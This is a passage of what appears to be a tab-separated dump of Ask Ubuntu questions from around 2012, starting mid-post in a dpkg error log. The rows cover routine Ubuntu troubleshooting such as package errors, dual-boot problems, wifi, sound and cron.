gnome-nettool transmission-common shotwell libpt2.10.2 browser-plugin-gnash gir1.2-totem-1.0 gnome-games-extra-data libgoffice-0.8-8 abiword-plugin-grammar lib32asound2 simple-scan liblink-grammar4 wine-gecko1.5 libexif-dev libjasper-dev libilmbase-dev gnash-common libzbargtk0 swell-foop fonts-cantarell winetricks libavahi-ui-gtk3-0 libcluttergesture-0.0.2-0 liblqr-1-0-dev gnotski gir1.2-totem-plparser-1.0 libwv-1.2-4 libgdome2-0 libaprutil1-dbd-sqlite3 gir1.2-gucharmap-2.90 libcolamd2.7.1 libclutter-imcontext-0.1-0 cheese-common sound-juicer vino libminiupnpc8 pax libgtkmathview0c2a libtelepathy-farstream2 iagno glines libwmf-dev libcogl-dev abiword-plugin-mathview libmx-1.0-2 gedit-plugins gnumeric-common liferea libxdot4 gnash gnotravex gir1.2-rsvg-2.0 gnect ps2eps ttf-unfonts-core quadrapassel libgraphviz-dev mahjongg gnumeric libfile-ncopy-perl gnome-games-data libudisks2-0 lib32z1 libevent-2.0-5 libmusicbrainz4-3 liferea-data libabiword-2.9 gnuchess fonts-droid lsb-core gnome-font-viewer ncurses-term totem-common dconf-tools nautilus-sendto-empathy gnumeric-doc libbz2-dev ttf-droid gnome-video-effects libgdome2-cpp-smart0c2a gnomine use 'apt-get autoremove ' to remove them . the following packages will be removed : wine1.5 wine1.5-amd64 0 upgraded , 0 newly installed , 2 to remove and 1963 not upgraded . 15 not fully installed or removed . after this operation , 117 mb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : error : file triggers record mentions illegal package name `libgdk-pixbuf2.0-0 ' ( for interest in file `/usr/lib/gdk-pixbuf-2.0/2.10.0/loaders ' ) : ambiguous package name 'libgdk-pixbuf2.0-0 ' with more than one installed instance dpkg-query : error : file triggers record mentions illegal package name `libgdk-pixbuf2.0-0 ' ( for interest in file `/usr/lib/gdk-pixbuf-2.0/2.10.0/loaders ' ) : ambiguous package name 'libgdk-pixbuf2.0-0 ' with more than one installed instance debsums : dpkg-query -- admindir=/var/lib/dpkg -- showformat= $ { package } $ { packagespec } $ { binary : package } $ { version } $ { status } $ { conffiles } $ { replaces } -- show failed ( exit status 2 ) e : problem executing scripts dpkg : :post-invoke 'if [ -x /usr/bin/debsums ] ; then /usr/bin/debsums -- generate=nocheck -sp /var/cache/apt/archives ; fi' e : sub-process returned an error code e : sub-process /usr/bin/dpkg returned an error code ( 2 ) root @ unimatrix725-24219 : ~/documents # when i try dpkg -- remove libgdk-pixbuf2.0-0 , i get : # dpkg -- remove libgdk-pixbuf2.0-0 dpkg : error : file triggers record mentions illegal package name libgdk-pixbuf2.0-0 ' ( for interest in file /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders ' ) : ambiguous package name 'libgdk-pixbuf2.0-0 ' with more than one installed instance
148793	how can i see all my windows files in ubuntu ?	i just downloaded ubuntu on my computer windows and when i turn it on and get started with ubuntu i never see any of my files ( music , photos , videos ) how i can match my windows vista files with ubuntu ?
148795	session is restarted continuously without request ( ubuntu 11.10 )	i 'm using ubuntu 11.10 with no problems on my desktop . suddenly , there are two weeks , it restart the session without apparent reason . it occurs without any warning and i lose my job . it worked perfectly until 2 weeks ago . please , help me !
148813	how do i install the 'no-ip ' package on 12.04 ?	i just installed ubuntu server 12.04 and i want to install no-ip . i ran as root : sudo apt-get install noip2 and i got this : root @ topcat : /var # sudo apt-get install noip2 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package noip2 i also tried with this command : wget http : //www.no-ip.com/client/linux/noip-duc-linux.tar.gz but i got this error : wget : unable to resolve host address 'www.no-ip.com'` can someone help me ? i am new to ubuntu .
148814	where can i download the iso torrents for ubuntu ?	where can i download the latest ubuntu 12.04.1 ( precise pangolin ) iso torrent files ? i use utorrent for downloading torrents . this answer has the index page this answer direct links to the .torrent files .
148818	flash removal and installation issue	i 'm having this issue trying to uninstall and/or upgrade the adobe flash player plug-in . here 's what i 've ran through the terminal : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.0.0-13-generic libgladeui-1-11 linux-headers-3.0.0-19-generic linux-headers-3.0.0-13 linux-headers-3.0.0-19 erlang-base use 'apt-get autoremove ' to remove them . the following packages will be removed : adobe-flashplugin 0 upgraded , 0 newly installed , 1 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 10.2 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 375840 files and directories currently installed . ) removing adobe-flashplugin ... update-alternatives : error : no alternatives for iceape-flashplugin . update-alternatives : error : no alternatives for iceape-flashplugin . dpkg : error processing adobe-flashplugin ( -- remove ) : subprocess installed pre-removal script returned error exit status 2 no apport report written because maxreports is reached already postinst called with argument `abort-remove' dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : adobe-flashplugin e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please advise if you can . let me know if there is any other info you need .
148825	why does `` ls > foo '' produce a file containing `` foo '' ?	i removed all files in a directory and then ran ls > foo in that same directory . running cat foo reveals that the newly created file `` foo '' contains `` foo '' . why is the file `` foo '' not empty ? when ls executes , there are no files in the directory yet , right ?
148826	why opening ubuntu 's default wallpaper ( warty-final-ubuntu.png ) in image viewer always fails ?	everytime i try to open ubuntu ( any version , since from 8.04 with which i started ) default wallpaper , named `` warty-final-ubuntu.png '' , i get the following error . i have also reported bug for the same , more than a year ago but it is still unresolved . also i do n't get the point why the default wallpaper is still named as `` warty-final-ubuntu.png '' instead of having actual code name prefix to which wallpaper belongs eg . `` precise-final-ubuntu.png '' and so on . general thoughts lots of community effort goes under development of this marvelous distribution but we 're still missing out to fix such silly issues , which is directly/indirectly affecting the number of new adopters .
148827	how to use `` win+num '' as a hotkey ?	i 'm using 12.04 , win+1 is a hotkey in unity , and now i 've removed unity and changed shell to gnome-shell-3.4 , but i still can not use win+num as an hotkey change to desktop num , i set it in system settings but nothing happens . thks for any help .
148839	ubuntu wont boot after installing wubi from windows 7	i have installed ubuntu destop with the windows installer ( in windows 7 ) . the installation seemed to be fine . however when i restarted the notebook ( hp pavilion g6 ) and choose to boot ubuntu , it only showed the violet screen and the logo and then it got a black frozen screen without doing anything . windows 7 works fine . what should i do ? thanks ! !
148841	where is the software centre in 12.04 ?	this has been apparent since my upgrade to 12.04 . just wondering if theres a way to manually open the software center or locate it ?
148844	list of drivers for samsung np300e5z-s08in	i am looking for a list of drivers for my samsung model mentioned in the title . for specs please visit the website . the laptop came with a version of free-dos installed . i overwrote that one with windows 7 entirely . the laptop also had shipped with it a software cd which had some driver software . below are the list of software ; i want to know the list of equivalent software i can get for ubuntu from the repo . would want the list for ubuntu 12.04 chipset driver intel me interface driver intel rapid storate technology graphics driver nvidia graphics driver sound driver lan driver wireless lan driver bluetooth driver touchpad driver ps : do n't forget to check the website for the specs
148855	not getting write speed and write method options in infrarecorder while burning image to disc	i am trying to burn iso image on cd using infra recorder.i referred site http : //www.ubuntu.com/download/help/burn-a-cd-on-windows for instructions but i am not getting `` write speed '' & `` write method '' options while burning , hence unable to click ok button.can nyone please help ?
148864	why there is a lot change in the hardware support features in different linux os ?	i am using lenovo b460 with 3 gb ram and 500 gb hard disk , ( no graphics card ) . when i live boot linux mint i was able to connect to wifi.but when i booted up ubuntu 11.4 i was not able to connect through wifi.then later i installed ubuntu 12.4 and then i got connected with wifi , but after installing icons and themes through my unity i am not able to view the content in the terminal and the wifi is also not connecting now even after i changed them all back . wireless connectivity
148865	how can i deactivate the print-spooler ?	my hp laserjet 5l needs to print direct because of its usb-adapter . how can i deactivate the print-spooler ?
148866	steps in installing ubuntu after burning iso image on disc	after burning iso image onto disc , what is the next step to proceed in installing ubuntu ? plz provide the steps ... .
148869	how to reduce noise in skype ?	according to alsamixer i do have a hda intel soundcard with nvidia mcp77/78 hdmi chip ( realtek sound card on msi notebook ) . when i use skype under ubuntu 12.04 for video calls , the other side hears background noise such as in windows when you have your microphone boosted . in fact they can hear everything , even the fans turning on . there is nothing tweaked on ubuntu 's fresh installation . also tried this site : https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages , but there are no *.deb files that i can test if any fix the problem . the question is if there is a way to add/tweak something to enable on software level the noise cancellation like the windows sound drivers have that option . i use my build in mic .
148870	after installation of ubuntu 12.04 inside windows no option to select windows or ubuntu ?	after installation of ubuntu 12.04 inside windows no option to select windows or ubuntu ? ? i installed ubuntu 12.04 from usb inside windows and when i restart pc no option to select windows or ubuntu ?
148876	how do i remove ubuntu 12.04 and install windows xp ?	i have an acer aspire one zg5 , ubuntu is the only operating system running . i want to put windows xp back on but it wo n't work . have been trying to find a way to format the harddrive but have had no success finding the place in which to do so . please help me get rid of ubuntu .
148877	why is n't discard automatic for ssds ?	i was surprised to find that the discard option still is n't added automatically to my fstab , even though i have an ssd . thus i have to follow these instructions to add it . why does n't the installer do this automatically ? is there some hidden drawback to using discard ? are there issues reliably detecting ssds ?
148881	dual boot windows xp and ubuntu 12.04	i have 41 gb of space on my e : / drive . is it sufficient to install ubuntu ? my windows xp is installed in c : / drive . is it ok for dual boot ? should i install ubuntu ( i am installing using live cd ) . i do n't want to lose my windows option .
148883	usb bose speakers with ubuntu 12.04	on a fresh install of ubuntu 12.04 my bose usb were n't working at all . i read through a large number of posts here and elsewehre on bose or usb speakers . i tried many things ( modifying a number of different files , etc. ) . this worked ... sort of : usb audio on 0 volume on startup the alsamixer works after i turn up the volume , but the sound crackles a lot . also , having to use a term mixer to change sound is n't ideal . any other ideas ? thank you , richard
148884	brightness controls not working on a sony vaio vpceh38fn	i have ubuntu 12.04 installed on windows 7 . when i use the fn alongside the key to reduce brightness , or even using the system settings , i am not being able to reduce the screen brightness . what is the problem ?
148888	where can i give feedback to kubuntu ?	i am an end-user of kubuntu and i wish to give feedback for it . what is the best source for that ?
148890	webcam working for admin , not for standard user ubuntu 12.04	i just installed ubuntu , i 've been a longtime debian user but i 'm a bit lost with some things . my admin account has everything working nicely , i created a standard user account for my wife but i have n't been able to make the webcam work on her account . i was thinking it had to be something related to the groups , when i ran groups on the admin account i got this : ale adm cdrom sudo dip plugdev lpadmin sambashare groups for my wife account : valentina nopasswdlogin i was kind of expecting my account to have the usual groups ( video , audio , etc ) , but got lost with this info . any suggestions ? help in advance .
148901	no keyring secrets found for [ ssid ] /802-11-wireless-security	i 'm on ubuntu 12.04 x64bit , installed it couple of days ago . the issue i 'm having is this : on startup it connects to my wireless without a problem , but after a while i am disconnected and prompted to enter the key for the wireless network ( which is entered - saved ) so i just click 'ok ' , but wireless does n't connect again . reseting network manager does n't help either . only restart , after which , ubuntu connects to the said wireless without a problem . terminal outputs this error message : ** message : no keyring secrets found for cimermanovic /802-11-wireless-security ; asking user . cimermanovic is the ssid name . also , here are some error messages that network manager is giving : ( nm-applet:31926 ) : gdkpixbuf-critical ** : gdk_pixbuf_scale_simple : assertion `dest_width > 0 ' failed ( nm-applet:31693 ) : gdkpixbuf-critical ** : gdk_pixbuf_scale_simple : assertion `dest_width > 0 ' failed ( nm-applet:30184 ) : gdkpixbuf-critical ** : gdk_pixbuf_scale_simple : assertion `dest_width > 0 ' failed what should i do to fix this ? thanks !
148903	ubuntu 12.04 works when installed boot-repair now one more problem	ubuntu 12.04 works when installed boot-repair now one more problem that after installation it give option boot ubuntu or win . when i put windows xp cd and delete delete drive e : in which ubuntu is installed and i save settings when i restart pc it give a black screen ;
148906	why does fusion icon not work in ubuntu 12.04	when i start the compiz fusion icon application from the shell i get the following output but no icon and no gui : $ fusion-icon -- no-start * detected session : gnome * searching for installed applications ... checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : default initializing decor options ... done * nvidia on xorg detected , exporting : __gl_yield=nothing * using the gtk interface
148910	is the gtkvncviewer broken in ubuntu 12.04 ?	when it try to start this application i get the following output : root @ peter-laptop : ~ # gtkvncviewer traceback ( most recent call last ) : file `` ./gtkvncviewer.py '' , line 426 , in instance = gtkvncviewer ( ) file `` ./gtkvncviewer.py '' , line 116 , in __init__ keyring = gnomekeyring.get_default_keyring_sync ( ) gnomekeyring.ioerror
148911	ubuntu 11.04 hangs at purple screen	i used to use ubuntu with no issues . since today , it just hangs at the purple screen forever . also i could n't try recovery mode as my keyboard does n't work when i am shown the recovery options menu . i am not able to select an option . info : dell inspiron , ubuntu 11.04 , windows 7
148914	problem with apt-get install command	i was trying to install p7zip for extracting 7z files in ubuntu 11.04 . on typing sudo apt-get install p7zip , i received the following error message : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_natty_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . what could be the problem ? my update manager is also not working .
148915	how can i get magnet links for ubuntu ?	torrent files are increasingly being replaced by magnet links , `` mini torrent files '' in concise and plain-text form that can be simply copy pasted around . those link to the actual .torrent file `` in the bittorrent cloud '' , without relying on servers that may be temporarily overtaxed ( `` omg new ubuntu must get now '' ) or simply offline . does canonical offer magnet links for their torrent distributions ? where can one find them ?
148920	how to upgrade from 11.10 to 12.04 without internet without internet connection ?	i want to upgrade from ubuntu 11.10 to ubuntu 12.04 . but my internet connection is not fast enough to do the task well . is there any other way to upgrade my distro/ or anything that i can download to upgrade my distro . offline ?
148924	which of vlc 's dependencies causes sound device detection ?	i am setting up a headless music server based on the minimal ubuntu image . after having installed the packages openssh-server , pulseaudio , libmad0 , flac , libogg0 , libid3tag0 , libvorbis0a , ffmpeg , mpd , mpc , mpdscribble , paman , paprefs , pavumeter neither my internal soundcard nor the external dac where detected by pulseaudio , that is pactl list did only list the dummy devices . several reboots did not change that . the hardware devices are detected properly : ~ $ lsusb | grep texas bus 002 device 002 : id 08bb:2706 texas instruments japan ~ $ lspci | grep audio 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) following a hunch , i installed vlc with all dependencies . after a reboot , both devices are detected ! ~ $ pactl list | grep `` sink : alsa_output '' monitor of sink : alsa_output.pci-0000_00_1b.0.analog-stereo monitor of sink : alsa_output.usb-burr-brown_from_ti_usb_audio_dac-00-dac.analog-stereo now i would like to remove vlc again but keep the devices . the question is : which of the many dependencies of vlc enables proper device detection ? and why on earth is it not a dependency of pulseaudio ?
148925	indicators showing the wrong color icons	i dont know whats wrong with my ubuntu but my top panel was gone its proper look .help me to restore it . i am giving you the sample image .
148926	datetime indicator shows times for unrequested locations	i am from india , so i have added my time locations in time settings . i have added only one location , but the indicator is showing other locations which i have not added to list . ( see the screenshot . ) why is this happening ?
148929	i ca n't copy any file to ext4 partition !	i converted on of my ntfs partition to ext4 format with gparted tool , but now i can not copy create any files to that partition , also on start up i have error reading of one partition so i have to skip it . ubuntu-studio 12.04 thanks for answers .
148930	wireless not working toshiba satellite c640	i installed ubuntu 12.04 on my laptop . it 's a dual boot system . wirelss working absolutely fine on windows 7 . but in ubuntu it says wireless is disabled by hardware switch but there is not switch for wifi in my laptop . i have tried these solutions rfkill unblock all blacklist acer-wmi interesting part is wifi is working fine if i use a live cd . network card in my laptop is ar9285 wireless network adapter ( pci-express ) this problem is driving me crazy .
148932	how can i get a list of all repositories and ppas from the command line ?	i know how to list all packages installed on my system . but how could i get a list of all repositories and ppa 's ? i know i can look into /etc/apt/sources.list and /etc/apt/sources.list.d , but i 'm looking for a way to generate a script that executes all apt-add-repository commands on a new system ( that sorts out getting all keys ) . any ideas ?
148934	eclipse with jdk 7 ending up with errors	ive tried to set up eclipse with suns jdk 7 and end aup with some errors on 12.4 i 'm not shure how to fix this issue , because i 'm a novice to ubuntu any ideas ? -- error messages -- ! session 2012-06-10 13:27:12.607 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_04 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=de_de command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2012-06-10 13:27:18.326 ! message anwendungsfehler ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/joachim/.swt/lib/linux/x86_64/libswt-gtk-3740.so ca n't load library : /home/joachim/.swt/lib/linux/x86_64/libswt-gtk.so > at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c . ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display . ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at > org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java > :153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 )
148938	installed ubuntu on alienware m17xr4 but unable choice it at startup	i have installed ubuntu 12.04 lts using a pen drive on alienware m17xr4 . but the problem is it does n't shows up at start up but when i tried to install it once again using the pen drive it revealed the previous previous installation .
148948	can not boot xp after installing ubuntu along with it	i am sorry but i am a noob at this and am trying to figure it out . i get the boot screen and even the option for windows xp but when i select it , the screen goes blank for a second ant then the same list is displayed.. have i installed it wrong or something ?
148953	which ubuntu to install on a hercules ecafe ex hd with arm cortex a8 in order to be able to use skype 's tools ?	i have purchased a hercules ecafăš ex hd which runs on ubuntu , but i ca n't install skype with this version . could you advise me which os from linux i can install to be able to use skype 's functions and how ? i 'm a real beginner in linux 's world but i think i will like it ! thanks a lot for your answords : )
148955	why do the gnome symbolic icons appear darker in a running application ?	i 'm creating an application that uses symbolic icons from the default theme . however , there are a few icons that i need that can not be represented by those from the default theme , so i 'm creating my own ones . what i did was to simply go to /usr/share/icons/gnome/scalable/actions/ , copied a few locally into my app 's source tree that could serve as a basis , and started editing them . so far so good . but i 've noticed the following : all symbolic icons are of a light grey color when looking at the original .svg file , but when they are put onto a widget , they become darker . here 's an example , using the /usr/share/icons/gnome/scalable/actions/view-refresh-symbolic.svg icon from the default theme : here 's what it looks like when opening the original with inkscape : and here 's what it looks like on a toolbar on a running application : notice the icon being much darker at runtime . that happens both with the ambiance and radiance themes . i would n't mind much , but i noticed it affects my custom icon , whereby parts of it become darker ( the inner fill ) , whereas parts of it remain the same color as the original ( the stroke ) . so what causes the default symbolic icons to darken and how should implement that for my custom icons ?
148956	how to set the default video player ?	how to set default video player 12.04 ( and other default app 's ) i try search system settings but ca n't find . ( ( (
148964	installation of ubuntu 12.04 starting but not getting completed	i have burnt the iso image on a cd.i am able to boot from the cd.i tried to install ubuntu 12.04 alongside windows.everything was working fine.resizing the partitions was done , installation started ... .it showed various features ubuntu has then it started retrieving files.while retrieving suddenly screen went blank.i tried 2-3 times but the same thing is happening again and again.i spent my whole day but not getting the solution : ( .somebody please help me ... i also checked whether iso file is proper using winmd5sum.it shows same values on comparing hashes.please help ... .
148965	accidentally removed all wine files	i was finding that if any way to remove the installed windows program in ubuntu . then i found a forum here http : //wiki.winehq.org/faq # uninstall_app . then i type in terminal cd $ home rm -rf .wine rm -f $ home/.config/menus/applications-merged/wine* rm -rf $ home/.local/share/applications/wine rm -f $ home/.local/share/desktop-directories/wine* rm -f $ home/.local/share/icons/ ? ? ? ? _* . { xpm , png } rm -f $ home/.local/share/icons/*-x-wine-* . { xpm , png } then i saw all my files in c ( desktop , downloads , documents around 30 gb ) is missing . please help to get my missing files .
148967	will my data be erased if i upgrade from ubuntu 11.10 to 12.04	if i am upgrading from 11.10 to 12.04 , then will my applications be deleted and also will my already configured mail setting deleted ? i have many mails in my inbox .
148969	how do i install dvd encryption library in ubuntu 12.04 ?	i recently installed ubuntu 12.04 . i 'm trying to play a dvd . when i open up movie player , i get a message that encryption library needs to be installed . can you advise me on what to do so i can play a movie from a dvd on my desktop with ubuntu 12.04 ? sincerely , massimo sorbara
148970	how to transfer files between ubuntu machines ?	i understand that this is a totally novice question but ... what is the best way for me to transfer files between two pc 's ? i have a laptop with ubuntu desktop ( 12.04 ) and a local server i 'm setting up using ubuntu server . i 'm used to windows environment where i might typically browse the network via windows explorer and move files around . this might work for ubuntu desktop , but what 's the best way for ubuntu server ? do i need to create a user on the server , then ssh into the server from the laptop ? can i then use a move command to move my files back and forth ? what do i need to look into ? thanks .
148971	battery indicator missing , ubuntu 12.04	there is a closed , question at battery indicator missing . but i have the problem and have not found any solution yet . also asked a question about it on launchpad but no replies again . https : //answers.launchpad.net/ubuntu/+question/197436 i updated the kernel from 3.2 to 3.4 precise . i have ubuntu 12.04 , on 64 bit machine , dell e6400 . i tried chawla @ chawla-laptop : ~ $ sudo apt-get install indicator-power reading package lists ... done building dependency tree reading state information ... done indicator-power is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 71 not upgraded . but nothing works , anyone have the idea about it ? thanks
148972	i have installed ubuntu 12.04 form usb and fix bootloder with boot repair now how to view that drive on windows ?	view ext live journal filesystem in windows i have installed ubuntu 12.04 in d : drive and that drive get hidden when ubuntu is installed because it convert drive to ext4 live journal filesystem how to view ext4 live journal filesystem in windows xp how to view that drive on windows
148975	can not unbind super key from unity	due to a graphics card compatibility issue using crunchbang , i was told that my best option would be to move to 12.04 lts . i 'm trying to get everything configured and personalized the way i 'm used to things , but am having some issues with unbinding default unity shortcuts . i 'm used to having all my shortcuts routed through the super key ( t for terminal , w for web , up for increased opacity , and so on ) . i 've followed instructions to install compizconfig-settings-manager , and did an advanced search for all keyboard shortcuts binding to the super key , including the unity shortcuts , but unity still seems to listen for that keypress , and thus neither compiz nor the keybindings set up in system prefs - > keyboard receive the commands i give them . ( i did try also to simply change the unity launcher key instead of disabling it as shown below -- neither worked )
148977	decreasing boot time on ubuntu 12.04	i know it is just a luxury problem . but i would like to decrease the boot time of ubuntu 12.04 . before it started up within 60 seconds , after tweaking a bit i keep it now constantly around 37 seconds . the last crucial part in my `` dmesg '' output are the following lines : [ 5.744117 ] firewire_core : created device fw0 : guid 0011d8000164b059 , s400 [ 35.289084 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 35.289091 ] addrconf ( netdev_up ) : eth1 : link is not ready i do not even have any idea what causes this delay , either this `` firewire_core '' or `` addrconf ( netdev_up ) '' . does anybody know how to fix this issue ? besides , my internet connection works fine so far . it is just about decreasing the computer 's start up .
148981	how do i use a bluetooth mac keyboard on ubuntu	i tried to use a wireless apple keyboard with my custom built ubuntu pc and the key board layout is shifted . i tried using a different layout several times but it still refuses to work properly . any ideas ?
148986	vb alternative/equivalent for development of windows apps in ubuntu	i want to develop a simple form for an invoice for the user to use on windows . i learnt how to do it using visual basic in windows . it 's the simplest way to make a gui for windows i suppose . i am going to link it to a database at the backend . i want an alternative or equivalent software that will provide me with similar drag-and-drop feature enabled programing and gui designing that will help me crate an application that will run on windows .
148990	ubuntu with no gnome-desktop autologin and fullscreen chromium	i 'd like to achieve following : no gnome-desktop auto login a user and load .bashrc auto startx and run my custom chromium now : i 'm able to start with text only , by adding `` text '' into /etc/default/grub i 'm able to login root , by editing /etc/init/tty1.conf ( ref1 ) but how to login as another user ? say 'ubuntu ' user and successfully load .bashrc ? how to auto invoke my app i am running after step2 login ? ref1 : auto-login to console as root - no xserver
148994	is it possible to put software in a queue to be installed later ?	sometime i find some software that is interesting and want to install it . at office i use pocket wifi so i do not want to download big files . i want some how to tag these files so i can install them later when i am at home at connected with wifi network ( more faster network ) . so is there any way that these software installation can be put in a queue , so that when i am at home it can start right away . is there any way to do this ?
148996	how to login after cleaning /etc/fstab ?	i cleaned /etc/fstab so i could fix my booting error of mounting drive , and i can not log into my main account . although i can log in as `` guest '' . also i have a backup of fstab in my home directory , but i do n't remember the folders name . it may be something like __back_up . how can i fix this ?
149004	how to edit flv comments ?	on ubuntu when i right click a flv file and go to properties > audio/video i see in the `` general '' section that is says `` comment : '' , but has no value . i need to add some text about the video there . how can i do it ?
149007	how to launch gnome shell extension preferences from the main menu ?	is it only possible to adjust extensions from browser or cli ? ( the command for it is gnome-shell-extension-prefs ) can i add a main menu entry for it ?
149010	vmbuilder fails on chroot	i am trying to install virtual machine with this command , but have no success : vmbuilder kvm ubuntu -- verbose -- suite precise -- flavour virtual \ -- part partitions.txt -- ip 192.168.1.3 -- hostname edb1 -- arch amd64 \ -o -- libvirt qemu : ///system -- user someuser -- pass somepass \ -- raw /home/virtual-machines/edb1.disk1.img \ -- raw /home/virtual-machines/edb1.disk2.img \ -- domain somedomain.com -- mem 4096 -- cpus 4 this is the error : ... i : extracting xz-utils ... i : extracting zlib1g ... w : failure trying to run : chroot /tmp/tmp_jdkzu mount -t proc proc /proc , stderr : the host kernel is not original but modified by server provider . why is the chroot needed for installation ?
149012	why is it that aa full deployment will require a minimum of 10 servers ?	i wish to try maas , and there 's only two machine , could i install one with maas service , and use maas and juju to deploy the other bare machine with openstack nova-compute ? thank you so much for answering .
149014	how to solve error processing /usr/lib/python2.7/dist-packages/pygst.pth : ?	error processing line 1 of /usr/lib/python2.7/dist-packages/pygst.pth : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 161 , in addpackage if not dircase in known_paths and os.path.exists ( dir ) : file `` /usr/lib/python2.7/genericpath.py '' , line 18 , in exists os.stat ( path ) typeerror : must be encoded string without null bytes , not str remainder of file ignored error processing line 1 of /usr/lib/python2.7/dist-packages/pygtk.pth : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 161 , in addpackage if not dircase in known_paths and os.path.exists ( dir ) : file `` /usr/lib/python2.7/genericpath.py '' , line 18 , in exists os.stat ( path ) typeerror : must be encoded string without null bytes , not str remainder of file ignored traceback ( most recent call last ) : file `` /usr/share/apport/apport-gtk '' , line 16 , in < module > from gi.repository import gobject file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 222 , in _load version ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 90 , in __init__ repository.require ( namespace , version ) gi.repositoryerror : failed to load typelib file '/usr/lib/girepository-1.0/glib-2.0.typelib ' for namespace 'glib ' : invalid magic header
149016	how to connect ubuntu computers to centos server ?	i have a server , running centos installed . i would like to connect other ubuntu pcs , to the server . how do i do that ? please help me . its urgent .
149017	how to cancel update manager downloading flashplugin-installer ?	update manger has frozen for about 60min when downloading flashplugin-installer . and the cancel button of applying changes dialog is disabled . when i click the top-left x , it does n't response . how to cancel downloading flashplugin-installer ? ... skip ... setting up libxatracker1 ( 8.0.2-0ubuntu3.1 ) ... setting up update-manager-core ( 1:0.156.14.5 ) ... setting up update-manager ( 1:0.156.14.5 ) ... setting up update-notifier-common ( 0.119ubuntu8.4 ) ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.236.orig.tar.gz
149021	gnome shell ubuntu short cut keys	i have ubuntu 12.04 , and gnome shell . if anyone know the keyboard short cut for all the basic operations such as shut down , log off , or for example ctrl+alt t for terminal . i needed the list > if anyone got , kindly share
149025	second screen is rotated in a dual monitor setup	i have a laptop connected to a second monitor using a vga port . no proprietary drivers used . when i go to system preferences -- > monitor and i turn that on it does n't look as it should , and it 's rotated 90 degrees clockwise or anti-clockwise . i ca n't choose normal on the rotation dropdown men첫 in the monitor preferences . i wonder if there is a workaround to make it look normal .
149026	why is n't this simple cron job working ?	i am on ubuntu server and would like to send an email to myself every 10 minutes ( as a test ) . the code for that is in this file : /var/www/cron-test.php to set up the cron i typed : crontab -e and added this line to the bottom of the file using nano editor : # # # email me every 10 min . */10 * * * * /var/www/cron-test.php but that script is not running every 10 minutes . i only recieve the email if i load the php script directly in my browser . the cron does n't seem to be executing at all . what am i doing wrong ? also this is my first time setting up a cron so putting the cron script in my www folder is probably not a good idea , should i put it elsewhere ? if so where ? also is there a cron error log ? where all failed crons can be seen ?
